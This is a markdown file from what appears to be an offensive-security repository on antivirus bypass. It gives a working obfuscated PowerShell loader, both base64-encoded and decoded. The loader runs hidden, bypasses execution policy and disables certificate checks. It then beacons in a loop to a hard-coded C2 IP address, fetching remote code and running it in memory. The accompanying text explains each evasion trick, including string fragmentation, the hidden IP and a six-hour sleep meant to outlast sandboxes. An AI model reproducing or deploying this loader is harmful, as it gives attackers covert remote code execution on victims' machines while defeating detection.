Skip to content

avbypass.md

Latest commit

 

History

History
40 lines (28 loc) · 3.31 KB

avbypass.md

File metadata and controls

40 lines (28 loc) · 3.31 KB

Antivirus Bypass

Evasion tactics, Polymorphic, Obfuscated, construction of malicious payloads to avoid detection by threat protection and other techniques to disable AMSI

PowerShell payload generator with obfuscation techniques

Obfuscated PowerShell Loader

C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -exec BYpass -C $e='JGdsb2JhbDpTbGVlcD0yMTYwMDskZ2xvYmFsOkFkZHI9J2h0dHBzOi8vOC4yMjAuMTg0LjE3Nzo0NDMnOyRjMT0nW1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrID0geyR0cnVlfTskYz0oTmV3LU9iamVjdCBOZXQuNDQ0KScuUmVwbGFjZSgnNDQ0JywnV2ViQ2xpZW50Jyk7JGMyPSd3aGlsZSgxKSAgeyRjLmhlYWRlcnMuYWRkKCJ1c2VyLWFnZW50IiwiU2FmYXJpcy81MzcuMzYiKTt0cnl7aWV4ICRjLkRvd25sb2FkU3RyaW5nKCInJyska2V5KScpfWNhdGNoIHsgc2xlZXAgJGdsb2JhbDpTbGVlcCB9fSc7aWV4KCRjMSskYzIrJGMzKSc=';ieX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($e)))

Decoded PowerShell Payload

$global:Sleep=21600;$global:Addr='https://8.'+'220.'+'184.'+'177:443';$c1='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$c=(New-Object Net.444)'.Replace('444','WebClient');$c2='while(1){$c.headers.add("user-agent","Safaris/537.36");try{iex $c.Download';$c3 ='String("'+$global:Addr+'/connect")')catch{sleep $global:Sleep}}';iex($c1+$c2+$c3)

Technique

Living off the Land (LotL) techniques. Using legitimate system tools like PowerShell, the attacker avoids the need to drop a suspicious executable file onto the disk, making detection significantly harder for traditional antivirus.

  1. Evasion and Obfuscation Tactics
  • Base64 Encoding: prevents simple keyword scanners (looking for things like DownloadString or WebClient) from flagging the command
  • Execution Policy Bypass (-exec BYpass): PowerShell's flag tells the system to ignore restrictions
  • Hidden Window (-w hidden): This ensures no console window pops up on the victim's screen, run silently
  • String Fragmentation & Replacement: instead of writing Net.WebClient, the attacker uses Net.444 and then calls .Replace('444','WebClient')
  • The C2 IP address is broken into small strings: 'https://8.'+'220.'+'184.'+'177:443'.
  • Antivirus use "Signatures" to find known malicious IPs or class names
  • SSL/TLS Validation Bypass: The command ServerCertificateValidationCallback = {$true} tells the script to trust any SSL certificate, allows use encrypted HTTPS communication without needing a legitimate certificate.
  • **Long Beacon Interval Low and Slow" Approach script sets a sleep timer of 21,600 seconds (6 hours). sandboxes only monitor a file for a few minutes, out-waits.
  1. Technical Execution Flow
  • Reverse shell Environment Setup, Sets the Address for C2 server URL, Creates a WebClient object (disguised as Net.444) Disables SSL certificate checks to C2 server
  • Infinite Loop (while(1)), Header Spoofing a standard web browser, download a string from the C2 server at the /connect endpoint, iex (Invoke-Expression) command takes code the C2 server sends and executes it in memory. the "reverse shell code" on victim's machine.
  • Error Handling & Persistence, the catch block triggers Instead of crashing simply sleeps for 6 hours and then retry.